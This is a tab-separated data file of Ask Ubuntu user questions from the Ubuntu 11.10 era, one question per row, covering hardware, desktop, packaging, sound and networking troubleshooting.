79633	which is the best version of ubuntu for aspire 4736z ?	i 'm using windows but i was desperately trying to use ubuntu , when installed the version 11.10 something it had a terrible problem : black screen when starting it and sometimes some glitches bothering my work = ) is there any acer user that can help me ? thanks in advance for any help = ]
79634	can i use an outlook anywhere account ?	my company uses outlook anywhere with exchange 2010 . is there any way i can set up an account on ubuntu with outlook anywhere ? or am just out of luck ... i 'm not wanting to use pop or any other protocol , just outlook anywhere .
79636	how to remove all traces of kde installed	i have 2 computers with ubuntu but on both i installed kde to have another option for the users . since unity has come along very well , there has not been a need to use kde for a while now . how can i delete all kde related packages with one single sweep , freeing space and anything kde related in ubuntu , including overwriting the logo of ubuntu when the pcs start or shutdown since after installing kde the kubuntu logo is the default one . how to revert back completely from all kde stuff with a simple short command line or gui tool . note - i ask this because it is very time consuming to start selecting , one by one , each package that relates to the kde desktop environment , checking if it also relates to any gtk , checking dependencies for each , etc.. deleting the package kubuntu-desktop does not remove every installed kde package that was installed with it since this is a pseudo package that installs the rest of the real packages but does not uninstall them which makes me wonder why a package can install a whole bunch of other packages but not uninstall them with some added option to actually uninstall them not just the dummy package itself .
79643	itunes alternatives for ubuntu	i have started using ubuntu very recently . i installed using wubi . can i get my windows itunes music to go onto ubuntu 's itunes alternative . also , how will i sync my ipod with ubuntu ? thanks !
79646	keyboard shortcuts are n't working in gnome shell	it seems that this problem is specific to ubuntu and not gnome 3 itself , that 's why i 'm not posting it on superuser but here . i installed at least 3 instances of ubuntu oneiric ocelot ( 11.10 ) on different hardware lately , all intended to work with gnome-shell ( gnome 3 ) as default desktop environment . on two of these system the default shortcut of alt+f2 did not work from the beginning . i had to configure it over the system settings > keyboard > shortcuts under system > show the command prompt to make it work . but on the system where it worked , the shortcut in this window was not visibly configured . also i wanted to configure win+e to open my home folder with nautilus and win+w to open a gnome-terminal . i configured this on the launchers menu , it then showed mod4+w and mod4+e now accordingly . note that the w and e are upper case , do n't know if this is relevant . the shortcut to open a terminal works in most of the cases , although in some rare cases i ca n't get it to open the terminal , no matter how often i press the button . this is clearly not the meaning of a global hotkey . even worse : the shortcut to open my home folder almost never works . if i 'm in a textbox in firefox for example , i see the cursor blinking up when pressing , but nothing happens . if the desktop is on focus , for pressing win+e i get a little textbox in the lower right showing an e as if selecting a file in nautilus by simply typing while in focus . but the problem exists also outside of textboxes . in most of the cases it helps to hammer it multiple times but then most of the times multiple instances of nautilus open up . this is clearly not useful . what is it with the global hotkeys ? those things did always make problems for me , already in lower versions of ubuntu and in gnome 2 . now it seems to be out of control completely . what components are responsible for handling this ? what can i do to make this work smoothly all the time and on all installations ?
79647	how to get suspend when idle if no user logged in ( lightdm )	i ca n't figure out how to get ubuntu 11.10 to suspend when idle from a lightdm login screen . i 've found methods to do this from gdm , but even those reference configuration files that are n't present in 11.10 . example : http : //ubuntuforums.org/showthread.php ? t=1559941 i 'm pulling my hair out , and i do n't have much left !
79651	how do i stop or start the desktop from loading on bootup ?	i occasionally want to use my ubuntu machine as a desktop but mostly as a headless file server . before i upgraded to oneiric , i used rcconf services to disable or enable the desktop . in oneiric i do n't see gdm ; so ca n't uncheck it . lightdm appears but is n't checked . i do n't see anything else that looks like a desktop . so , how can i disable , an occasionally enable , the oneiric desktop ?
79652	is there a way to emulate the 'dynamic workspaces ' functionality in unity ?	the one feature of gnone shell that i would love in unity is the 'dynamic workspaces ' . is there a way to emulate this functionality within unity ? i know it can be changed via ccsm , but that method is slow and defeats the purpose of dynamic workspaces .
79653	display is wrong at startup until i click on `` display '' then it 's fine ? -dual montors unity 2d	my display is wrong after it reboots . i then go to `` displays '' and without touching anything else it fixes itself . i then close out the `` display '' function and the resolutions are correct and the monitors are not mirroring each other . i am using ubuntu 11.10 in unity 2d mode . i have dual monitors setup . how can i fix this so i do n't have to open up the `` displays '' every-time i reboot ?
79655	why has n't mozilla 's firefox beta ppa updated yet ?	i 've included ppa : mozillateam/firefox-next in my software sources , but even though firefox 9 beta got released , my system still has firefox 8 ! why is this , and how do i get the latest ?
79656	how do i export banshee library settings to another machine ?	i am trying to downgrade my distro . the thing is , i have spent some few hours organising my music library and i do not want to lose my database . i have checked 'write meta data to files ' . and so , my understanding is , that if i just import those same mp3s into a new library , those files will be arranged in the same order in the library . but this does n't sound like a safe enough option . i 'm moving from 11.10 to 10.04 . any help would be greatly appreciated . newbie
79663	ibm ultrium tape drive shows up but ca n't mount a tape	i have this tape drive install in a dell poweredge 2900 server and i can seem to get it working , ubuntu can see the drive but i cant mount any tape i even did mt -f /dev/nst0 erase and the drive led started to blink . any suggestions ?
79664	how can i use my apc ups with ubuntu ?	i have a apc 350 , and i 'd like to use it with ubuntu 11.10 . functionality i 'd like : show in the gnome battery indicator how much time is left on the ups , like this : have options for how longer after it goes on battery power until it shuts down . ( images via here , and here ) is this possible , and if so , what software do i need to install ?
79665	keep only essential packages	in an attempt to learn more about ubuntu and its packages , i want to remove all non-essential packages , so i can install what i need , when i need them and know what they do . i 'm using the commands dpkg -- clear-selections and apt-get dselect-upgrade for this . i also slightly modify the selection by setting apt libstdc++6 ( due to apt ) install-info ( due to grep ) to install again ( somehow dpkg thinks they are not essential , but apt-get complains ) . is this ok , or is this bad ? if it 's ok , what do i do with the large list of packages with `` deinstall '' status in dpkg ? an additional note , i 'm doing this on a vps template so i have no control over the initially installed packages .
79668	ubuntu server terminal ?	i installed ubuntu server on my windows 7 computer and ca n't reboot windows 7 . i want know if i accidently formatted my hard drive or if i accidently replaced my os . how do i download ubuntu from the ubuntu server terminal ? alejandro @ jandromunoz : ~ $ df -h filesystem size used avail use % mounted on /dev/mapper/jandromunoz-root 680g 1.4g 644g 1 % / undev 3.9g 4.0k 3.9g 1 % /dev tmpfs 1.6g 400k 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 4.0k 3.9g 1 % /run/shm /dev/sda1 228m 29m 188m 14 % /boot /home/alejandro/.private 680g 1.4g 644g 1 % /home/alejandro alejandro @ jandromunoz : ~ $ mount /dev/mapper/jandromunoz-root on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda1 on /boot type ext2 ( rw ) /home/alejandro/.private on /home/alejandro type ecryptfs ( ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=71839318eaf89afd , ecryptfs_fnek_sig=2aaae6 alejandro @ jandromunoz : ~ $ sudo fdisk -l [ sudo ] password for alejandro : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00025c60 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 1465147391 732322817 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 501760 1465147391 732322816 8e linux lvm disk /dev/mapper/janbromunoz-root : 741.4 gb , 741360009216 bytes 255 heads , 63 sectors/track , 90131 cylinders , total 1447968768 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/jandromunoz-swap_1 does n't contain a valid partition table alejandro @ jandromunoz : ~ $ sudo parted -l model : ata toshiba mk7559gs ( scs1 ) disk /dev/sda : 750gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 256mb 255mb primary ext2 boot 2 257mb 750gb 750gb extended 5 257mb 750gb 750gb logical lvm error : /dev/mapper/jandromunoz-swap_1 : unrecognized disk label model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/jandromunoz-root : 741gb sector size ( logical/physical ) : 512b/4096b partition table : loop number start end size type file system flags 1 0.00b 741gb 741gb ext4
79675	ca n't get whole picture on the screen of a new monitor	i have a 24inch , vm2453mh-led , viewsonic monitor using a radeon 6570hd video card . both are new . viewsonic says the optimum size is 1920x1080 . at this size the picture is beautiful , but it overlaps the screen vertically and horizontally . i am using ubuntu 11.10 , the gnome 3 version , not unity . on the overview screen , the vertical icons are nearly off screen . only the right edge shows . i opened the monitor 's control menus to see if i could adjust it , but both the h/v position and horizontal size are grayed out . i tried a 1600x1200 setting , and the picture was in bounds , but the quality was less , and it was stretched horizontally . the two monitor menu options were grayed out just like with the 1920x1080 setting . can someone tell me how to resolve this problem ?
79679	ca n't install ubuntu in my sony vaio vpc21efx	i wonder if anyone ever tried to install ubuntu [ 11.10 in my case ] in a sony vaio vpc 21efx , preferably using wubi . i tried several ubuntu builds but none of them seem to work . i just get a black screen after install . i also tried booting from a flash drive and get the same error . all help is apreciated . thanks edit ( 1 ) : i tried wubi installs multiple times with the images below : ubuntu-11.10-desktop-i386.iso ubuntu-11.10-desktop-amd64.iso kubuntu-11.10-desktop-amd64.iso to install an image what i did was i put the image i wanted to install in a folder with wubi.exe and ran wubi from there . i did md5 check all iso images i 've downloaded . i also tried a boot from a flash drive but only got a `` black '' screen [ i follow ubuntu instructions to install this tool and mount the image in the flash drive http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3 ] i 'm running windows 7 64bits with sp1 the only msg i get is after i choose ubuntu from the boot menu after the installation , before i get the black screen i see this : try ( hd0,0 ) : ntfs5 : no wubildr try ( hd0,1 ) : ntfs5 : no wubildr try ( hd0,2 ) : ntfs5 : error : `` prefix '' is not set .
79680	how do i get an airprint working with my printer ?	i have a brother mfc 260c and am trying to get airprint and ios 5.01 to print from ipad 2 any help would be much appreciated
79683	is it possible to decrease the font size in the firefox bookmarks bar ?	i have a lot of bookmarks saved and keep them ordered in folders . however , i feel the font size and spacing in the bookmarks bar is bit large . therefore , it requires quite a bit of clicking/scrolling to access bookmarks that are hidden by the chevron ( > > ) . is it possible to minimize the spacing and font for firefox bookmarks bar ? that way , it would look nicer similar to firefox on windows .
79684	syslog not showing log levels in messages	here is sample output of my syslog messages in /var/log/syslog : nov 15 20:20:48 ubuntu winbindd [ 915 ] : [ 2011/11/15 20:20:48.940063 , 0 ] winbindd/idmap_tdb.c:287 ( idmap_tdb_open_db ) nov 15 20:20:48 ubuntu winbindd [ 915 ] : upgrade of idmap_version from -1 to 2 is not possible with incomplete configuration how do i see what was the level of message , like info , warn , error etc. ? i am using ubuntu 10.04 lts with rsyslog package version 5.8.1-1ubuntu2 .
79686	flash problem in firefox ubuntu	i have flash problem on youtube and other flash sites in firefox but they work good in chromium the screen shots firefox chromium how i can i fix this problem ?
79689	partition mount error on boot	i wanted to mount a partition automatically on boot , so i used storage device manager , as recommended on ubuntu help . the problem is i named it with my name instead of leaving it default . so , instead of monuting it to media/sda3 , it tries to mount to media/fabio ( which is my name ) . the problem is it ca n't mount and always says `` error mounting media/fabio . press s to skip or m to manually mount it '' here is an image of my fstab file on /lib/init/fstab i searched for similar topics but none of them worked or were exactly what i wanted .
79691	where do i get extra compiz plugins ?	i installed compiz on my laptop running ubuntu 11.10 last week . the way i installed it was kind of different , i opened up a terminal and typed this command : sudo apt-cache search compiz after that , i installed all the packages that appeared in the terminal window . i enjoyed all the effects of compiz like paint fire on screen , desktop cube , but i ca n't help but noticing people having some extra plugins which i do n't have , such as atlantis , snow , tile and much more . where are they getting all those plugins and how do i get them ?
79694	how can i run emacs in gnome terminal without popup interface ?	just like using emacs on putty . i just transfered to ubuntu from windows . i also got error message when i tried to open a matlab .m file using emacs . code : emacs job.m 701 $ emacs job.m warning : locale not supported by xlib , locale set to c warning : x locale modifiers not supported , using default warning : can not convert string `` -*-courier-medium-r-*-*-*-120-*-*-*-*-iso8859-* '' to type fontstruct warning : can not convert string `` -*-helvetica-medium-r-* -- *-120-*-*-*-*-iso8859-1 '' to type fontstruct besides , in the ide of emacs , all the characters are not readable . thanks a lot for any help .
79695	what to do when can not install software-center ?	i upgraded from 11.04 to 11.10 today . during upgrade , the system freezed when configuring/installing software center . unfortunately i had to give it cold reboot . after that i am able to log in to new 11.10 but when i try to install anything , i get e : dpkg was interrupted , you must manually run 'dpkg -- configure -a ' to correct the problem . sudo dpkg -- configure -a i run that and again it hangs at configuring software-center . i do not know what to do ! i tried sudo apt-get remove -- purge software-center but it says since apt-get was interrupted , run dpkg -- configure -a ( and then the cycle repeats , freeze at software-center ) . ** update 1 : ** i tried the steps as suggested but no success . it freezes when configuring software-center . here are my steps : sony @ sony-vgn-cs17g-r : ~ $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=11.10 distrib_codename=oneiric distrib_description= '' ubuntu 11.10 '' sony @ sony-vgn-cs17g-r : ~ $ uname -a linux sony-vgn-cs17g-r 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:50:42 utc 2011 i686 i686 i386 gnu/linux sony @ sony-vgn-cs17g-r : ~ $ lang=c ; sudo apt-get -- simulate -- purge autoremove reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : libboost-python1.42.0* libdvbpsi6* libmagick++3* libmatroska3* libphonon4* libx264-106* linux-headers-2.6.38-8* linux-headers-2.6.38-8-generic* phonon* phonon-backend-gstreamer* python-gtkmozembed* python-pypdf* python-pythonmagick* xulrunner-2.0* xulrunner-2.0-mozjs* 0 upgraded , 0 newly installed , 15 to remove and 0 not upgraded . 45 not fully installed or removed . purg libboost-python1.42.0 [ 1.42.0-4ubuntu2 ] purg libdvbpsi6 [ 0.1.7-1 ] purg python-pythonmagick [ 0.9.1-3ubuntu6 ] purg libmagick++3 [ 8:6.6.0.4-3ubuntu1 ] purg libmatroska3 [ 1.1.0+dfsg-0ubuntu2 ] purg phonon [ 4:4.7.0really4.5.0-3ubuntu4 ] purg phonon-backend-gstreamer [ 4:4.7.0really4.5.1-1ubuntu3 ] purg libphonon4 [ 4:4.7.0really4.5.0-3ubuntu4 ] purg libx264-106 [ 2:0.106.1741-3 ] purg linux-headers-2.6.38-8-generic [ 2.6.38-8.42 ] purg linux-headers-2.6.38-8 [ 2.6.38-8.42 ] purg python-gtkmozembed [ 2.25.3-7ubuntu2 ] purg python-pypdf [ 1.13-1 ] purg xulrunner-2.0 [ 2.0+nobinonly-0ubuntu1 ] purg xulrunner-2.0-mozjs [ 2.0+nobinonly-0ubuntu1 ] conf language-pack-gnome-en ( 1:11.10+20111006 [ all ] ) conf language-pack-gnome-en-base ( 1:11.10+20111006 [ all ] ) conf libmono-system4.0-cil ( 2.10.5-1 [ all ] ) conf libmono-system-configuration4.0-cil ( 2.10.5-1 [ all ] ) conf libmono-posix4.0-cil ( 2.10.5-1 [ all ] ) conf libmono-system-core4.0-cil ( 2.10.5-1 [ all ] ) conf libdbus1.0-cil ( 0.7.0-4 [ all ] ) conf libdbus-glib1.0-cil ( 0.5.0-3build1 [ all ] ) conf libglib2.0-cil ( 2.12.10-2ubuntu1 [ i386 ] ) conf libgconf2.0-cil ( 2.24.2-1 [ all ] ) conf libgdata1.7-cil ( 1.7.0.1-1build1 [ all ] ) conf libgkeyfile1.0-cil ( 0.1-2ubuntu2 [ all ] ) conf libmono-system-drawing4.0-cil ( 2.10.5-1 [ all ] ) conf libgtk2.0-cil ( 2.12.10-2ubuntu1 [ i386 ] ) conf libgtk-sharp-beans-cil ( 2.14.1-2build2 [ all ] ) conf libgudev1.0-cil ( 0.1-2build1 [ all ] ) conf libmono-sharpzip4.84-cil ( 2.10.5-1 [ all ] ) conf libmono-addins0.2-cil ( 0.6.1-2ubuntu1 [ all ] ) conf libmono-zeroconf1.0-cil ( 0.9.0-2build1 [ all ] ) conf libnotify0.4-cil ( 0.4.0~r3032-3build1 [ all ] ) conf banshee ( 2.2.0-1ubuntu2 [ i386 ] ) conf banshee-extension-soundmenu ( 2.2.0-1ubuntu2 [ i386 ] ) conf libubuntuone1.0-cil ( 0.11.0-0ubuntu2 [ all ] ) conf banshee-extension-ubuntuonemusicstore ( 2.2.0-1ubuntu2 [ i386 ] ) conf liblaunchpad-integration1.0-cil ( 0.1.54 [ i386 ] ) conf libmono-addins-gui0.2-cil ( 0.6.1-2ubuntu1 [ all ] ) conf libmono-csharp4.0-cil ( 2.10.5-1 [ all ] ) conf gbrainy ( 2.03-1ubuntu1 [ all ] ) conf libappindicator0.1-cil ( 0.4.1-0ubuntu2 [ all ] ) conf libart2.0-cil ( 2.24.2-1 [ all ] ) conf libglade2.0-cil ( 2.12.10-2ubuntu1 [ i386 ] ) conf libgmime2.4-cil ( 2.4.26-0ubuntu2 [ all ] ) conf libgnome-vfs2.0-cil ( 2.24.2-1 [ all ] ) conf libgnome2.24-cil ( 2.24.2-1 [ i386 ] ) conf libmono-management4.0-cil ( 2.10.5-1 [ all ] ) conf libndesk-dbus1.0-cil ( 0.6.0-5 [ all ] ) conf libndesk-dbus-glib1.0-cil ( 0.4.1-3build1 [ all ] ) conf libreoffice-l10n-en-gb ( 1:3.4.3-1ubuntu1 [ all ] ) conf libreoffice-help-en-gb ( 1:3.4.3-1ubuntu1 [ all ] ) conf libreoffice-l10n-en-za ( 1:3.4.3-1ubuntu1 [ all ] ) conf mono-csharp-shell ( 2.10.5-1 [ all ] ) conf openjdk-6-jre-lib ( 6b23~pre10-0ubuntu5 [ all ] ) ** > conf software-center ( 5.0.1.4 [ all ] ) -- -- -- -- - > freezes here ** conf tomboy ( 1.8.0-1ubuntu1 [ i386 ] ) conf ubuntu-desktop ( 1.245 [ i386 ] ) i have used the simulate option of apt-get ; else i would not be able to copy the terminal . i tried not following these steps and moving on , but eventually , someway or the other system freezes when software-center comes into picture .
79699	is it possible to do a usb file transfer on a motorola droid x2 ?	i just got a droid x2 and i want to mount my microsd located in my droid x2 on my laptop running ubuntu 11.04 , and i am wondering if there are some drivers , or a program i need to install , because i just bough a usb cable for it . my droid x2 is currently running android 2.3.4 .
79700	ssh client not showing prompt after successful login	i 'm having problems with my ssh client on ubuntu 10.10 . when i switch on my computer and open a terminal and execute the command ssh user @ host , it gives me a password prompt after which i enter the right password , i then get a prompt to execute my commands on the remote computer . now the problem is , after a little while ( probably around 10 minutes ) , the terminal window stops accepting commands ( no matter what i type , nothing shows ) . once this happens , i close the terminal window and try to start all over again by opening another terminal window . but this time around , after entering the right password , i do n't get a welcome message or prompt . the cursor just keeps blinking on a new line . i ran the ssh command with -v parameter and the message i get after a successful login is : debug1 : authentication succeeded ( password ) . debug1 : channel 0 : new [ client-session ] debug1 : entering interactive session . debug1 : sending environment . debug1 : sending env lang = en_gb.utf8 still the cursor keeps blinking on a new line without a prompt . however , putty ssh client works perfectly on the same machine . thank you very much for your time . your help would be greating appreciated .
79701	linux mint 12 's mgse interface in ubuntu ?	linux mint 12 is using mgse which makes the gnome shell more like gnome 2.x interface . i would like to know if that was possible on ubuntu and how i would go about doing that .
79711	is backtrack 5 equal to ubuntu + security tools ?	i just ran backtrack 5 live cd , and it basically seems to me as if i had ubuntu + the security tools backtrack includes ... is there any difference between backtrack 5 and ubuntu desktop 10.04 ? apart from having the security tools ... because if there is n't i do n't see why you could n't use backtrack 5 as a main os ...
79715	where can i order or request an ubuntu installation cd or dvd ?	i need to upgrade my existing ubuntu system , and i also want to install ubuntu on a new laptop . i would like to have an installation cd or dvd to do both of these . where exactly i can order or request an ubuntu installation cd/dvd ?
79721	wifi connection slow after upgrade to 11.10	under 11.04 , my wifi connection was fine and running at full 802.11n speeds . after upgrade , wifi becomes painfully slow . wired connection operates normally . ran command lines echo `` # disable ipv6 '' | sudo tee -a /etc/sysctl.conf echo `` net.ipv6.conf.all.disable_ipv6 = 1 '' | sudo tee -a /etc/sysctl.conf echo `` net.ipv6.conf.default.disable_ipv6 = 1 '' | sudo tee -a /etc/sysctl.conf echo `` net.ipv6.conf.lo.disable_ipv6 = 1 '' | sudo tee -a /etc/sysctl.conf then restarted . no change . after downgrading to 11.04 , normal wifi operation was restored .
79722	what antivirus programs are available ?	what antivirus programs are available for ubuntu ? we previously used symantec endpoint protection but it does not work in ubuntu .
79723	ca n't switch with hybrid graphics , amd radeon hd6470m on an hp pavilion g4	my laptop : hp pavilion g4-1212tx proc : sandybridge intel core i5 vga : intel integrated graphic proc amd radeon hd6470m ( discrete ) dual os win 7 and ubuntu 11.10 . no problem with win 7 , i can switch vga ( radeon or intel ) via catalyst but no luck with ubuntu 11.10 . i have to set `` nomodeset '' in grub to avoid black screen . i ca n't switching vga between intel/amd or just use amd for all application in ubuntu . brightness can not adjustable . i have try to install fgrlx and radeon propietary driver , but did n't worked .
79724	why is there a delay for logging in ( wubi ) ?	i use wubi to install ubuntu under win7 in partition f which is fat32 . when i choose ubuntu at boot time , it jumps into a window . it shows two choices : ubuntu ubuntu recovery after choosing ubuntu , it shows : error : file not found error : you need to load kernel first press any key to continue . it goes back to the choice window after i press a key . again i choose ubuntu , and it goes black and then it comes to the login window . after i log in it works . my question is : is what happens before the login window normal or not ( when using wubi ) ?
79725	why does n't krename start in ubuntu 11.10 ?	i have installed krename from the official repository in ubuntu 11.10 . but it does n't start . what i can do to fix it ?
79728	error ubuntu 11.10 despues de instalar [ error after installing ubuntu 11.10 ]	instale ubuntu 11.10 , termino de instalar y no tiene nada , ni aplicaciones , ni esa barrita lateral de unity , no tiene nada , ni si quiera la barra donde aparece la hora ; ¿por qué ? y me aparece un cuadro diciendo que hay un error en el disco y que el fallo es inminente , ¿qué es ? smart no entiendo , ayuda . y en otro disco duro con windows xp sp3 se bloquea cuando lo instalo desde el live cd , y desde wubi aparece esto , ¿qué hacer ? : english translation ( via google translate , edited ) i have installed ubuntu 11.10 , after finishing the installing there is nothing , no applications , no the sidebar called unity , there is nothing , not even the bar where time appears , why ? . i get a box saying there is an error on the disk and that failure is imminent . what is smart , i do not understand , help in my other hard drive , with windows xp sp3 , it crashes when i try install from the live cd using wubi , this appears , what to do ?
79729	how can i change what action is caused when the power button is pressed ?	i want know if there 's a way to change the action when the power key is pressed . i use ubuntu 11.10 and when it is pressed it opens a small window with shutdown options . i want know how to change this , and make it open anything else . is there a way to do that ? and how ?
79730	how can i adjust brightness settings when i am on battery ?	i ca n't find brightness settings that work from battery mode in the ubuntu 11.10 screen settings . there are some settings from ubuntu 11.04 in gconf , 90 % for ac and 60 % for battery , but it does n't work . how can i have my display brightness dim automatically when on battery power ?
79731	how can i switch between gnome-shell and unity without logging off ?	how can i switch between unity and gnome-shell without logging of my account . this will help me to switch between both anytime .
79740	xvidcap : error accessing sound input from /dev/dsp	i 'm running ubuntu 11.10 and i 'm trying xvidcap to record a screencast with audio from the microphone , however it ca n't record any sound : $ xvidcap -- file appo.avi -- cap_geometry 700x500-0+0 error accessing sound input from /dev/dsp sound disabled ! sure enough /dev/dsp does n't even exist : $ sudo ls -lh /dev/dsp ls : can not access /dev/dsp : no such file or directory i found a blog post about fixing xvidcap sound input , however if i try the suggestion i get : $ sudo modprobe snd-pcm-oss fatal : module snd_pcm_oss not found . so the question is , how can i create /dev/dsp ? the problem behind the problem is : how can i record sound from the microphone with xvidcap ? so workarounds are welcome too . update : i 've followed the suggestion of james , and something has improved . the error accessing /dev/dsp is gone , however now i get : [ oss @ 0x8e0c120 ] estimating duration from bitrate , this may be inaccurate xtoffmpeg.c add_audio_stream ( ) : ca n't initialize fifo for audio recording now when i record xvidcap appears in the recording tab of pavucontrol and i can choose audio stream from internal audio analog stereo or monitor of internal audio analog stereo , i tried both just in case , but the video is still mute . update 2 : i found that `` monitor of '' is the one to record application sounds , while for microphone , i should choose `` internal audio analog stereo '' . to rule out other problems , such as with the microphone , i tried with gnome-sound-recorder and it works . actually i jumped on my chair , since the volume was too high ! : - )
79741	blank space on right side of screen with xmonad/gnome	fresh install of 11.10 x64 . i set up xmonad with gnome-session as i did before on 11.04 , following the guide on the arch wiki . everything works , but there 's this weird vertical space about the size of a scrollbar on the side of the screen . the space is also above xmobar ( the battery system tray icon is hidden behind it and i ca n't click it ) . xmonad weird space ( since i ca n't post images ) is there some weird xmonad or gnome option i 'm missing ? i do n't even know where to begin to look .
79746	how do i get an hp scanjet 2300c working ?	after i connect my hp scanjet 2300c , ubuntu 11.10 wo n't detect it . i have searched for a driver in the internet but i still have n't found any compatible driver for the scanjet 2300c .
79747	update-alternatives : error : no alternatives for	i tried to follow the excellent answer to the question how to correctly remove openjdk and jre and set the system use only and only sun jdk and jre ? , but there seem to be some side effects : root @ ubuntu10 : /usr/local/bin # update-java-alternatives -s java-6-sun update-alternatives : error : no alternatives for java-rmi.cgi . update-alternatives : error : no alternatives for mozilla-javaplugin.so . update-alternatives : error : no alternatives for xulrunner-1.9-javaplugin.so . update-alternatives : error : no alternatives for mozilla-javaplugin.so . update-alternatives : error : no alternatives for xulrunner-1.9-javaplugin.so . any idea how to correct this ?
79748	when i unplug my usb hd via `` safely remove '' my system hangs	mother board is ( dg41rq ) , processor ( 2.93 ghz ) , ram ( 4 gb ) , my external hard drive is samsung ( 1.5 tb ) ..when i unplugged ( safely remove ) my system got hanged . i am using ubuntu 11.10 dvd version
79753	how can i start an xvnc server at boot ?	i used to have a xvnc server that was running at boot on my ubuntu 9.04 os and i would like to do the same with 11.10 . the procedure i followed at the time was this one . there was some configuration to do in gdm which i can not find in ubuntu 11.10 . the result is that when i connect to my computer with vncviewer it stays in a basic x screen with the simple x cursor and i get no option to log . the solution to this in prior versions of ubuntu was to enable remote login system - > administration - > login window remote tab choose `` same as local '' ( or whatever ? ) what would be the equivalent configuration on 11.10 ? maybe something to change in the config files of lightdm which seems to be the new display sessions manager in 11.10 ?
79760	accessing my files from windows	i recently installed ubuntu alongside windows . i have seen several guides giving me the same advice as to how to mount my harddrive with my windows files in it in ubuntu but it does n't ever show my drive when i click the home folder . is there anything i can do ?
79762	sound unavailable every other session	on my desktop running oneiric , sometimes there 's no sound at all , but it would work normally at other times . my setup is built ground-up from minimal ubuntu , but since sounds work fine , at times , i do n't think it is a backend dependency issue . when it works , it will play anything from regular audio files and movies to youtube flash players . for the record , i installed lxde with the alsa-base and alsa-utils packages which are the only audio-related dependencies for the lubuntu-desktop . for a while , i also used persistent oneiric live usb , and do not recall any sound issues . it 's one thing to not play sound entirely , but playing sound only under some very unclear circumstances is something else . please help me diagnose it .
79766	keyboard stopped working on persistant live-usb	my keyboard has recently stopped working on my 11.10 persistant live usb . it works at the login screen , but when i log in , any time i hit a key i just hear the error `` pop '' sound . this happens in all of my sessions ( unity , gnome shell , and gnome classic ) . also tried the on screen keyboard ( on-board ) , which didnt work either . neither does the computers hardware power button , except when you hold it for 5 seconds . i doubt this has anything to do with it , but it the interest of complete information i 'll tell you that just before the error started happening i installed `` mediaplayer gnome shell extension '' https : //github.com/eonpatapon/gnome-shell-extensions-mediaplayer as soon as i refreshed gnome with `` alt-f2 > r > enter '' the keyboard stopped working . i immediately disabled the extension in gnome-tweak , but the keyboard still refused to work .
79767	automatically solve dependencies of deb packages	installing deb packages on the command line , using dpkg -i , only installs the package in question and displays errors of unresolved dependencies ( manually solved by apt-geting the packages it complains about ) . how do i automatically resolve dependencies when installing standalone packages ?
79769	is ubuntu one available for fedora ?	i just wondering why ubuntu is not developing the ubuntu one client for fedora even the closed source one . it will help to broaden the ubuntu cloud and revenue generating ubuntu music store by introducing the same to fedora and other linux distribution . looking forward to see this happen in near future .
79773	administrator user session only shows a terminal	weird problem : after upgrading to 11.10 ( and i am sure that i worked with it for couple of days ) . we had a power failure , and now , when open the computer , what i get is a screen , with a scrollable list of users ( administrator is one of them ) . when i select the administrator user , and login , i get on the top left a terminal window . that 's it ! i do n't see my regular ubuntu desktop . what 's wrong ? i have tried some of the issues mentioned here : delete the .xauthority sudo apt-get update *i had some dns errors , so had to fic my /etc/resolv.config ( works now ) please advise .
79774	what is default username & password for a persistent pendrive ?	i am trying out ubuntu 11.04 on a netbook . i created a live usb to boot from using this : http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ and the system boots up into ubuntu from the usb stick , great ! bad news is i am presented with a login form ... . i did not set a password so i have no idea what it could be ... . username : other password : i have tried no password , no luck ... i tried ubuntu , no luck any ideas why it has a password , and what it might be or how i can set the password ?
79777	wine security - improvement by second user account ?	team , i 'm considering installing wine - but still hesitant for security reasons . as far as i found out , malicious code could reach ~/.wine and all my personal data with my user-priviledges - but not farther than that . so - would it be any safer to create a second user account on my machine and install wine there ? that way , the second user would only have reading rights to my files . is there a way to install wine totally confined to that user - so that i ca n't execute .exe files from my original account ? ps - i 'm running ubuntu 11.10 64bit if that matters .
79779	which dropbox installer do i have to download for use on lubuntu ?	which one should i use - ubuntu or debian ? the debian one i guess since lubuntu does n't use nautilus . not sure though .
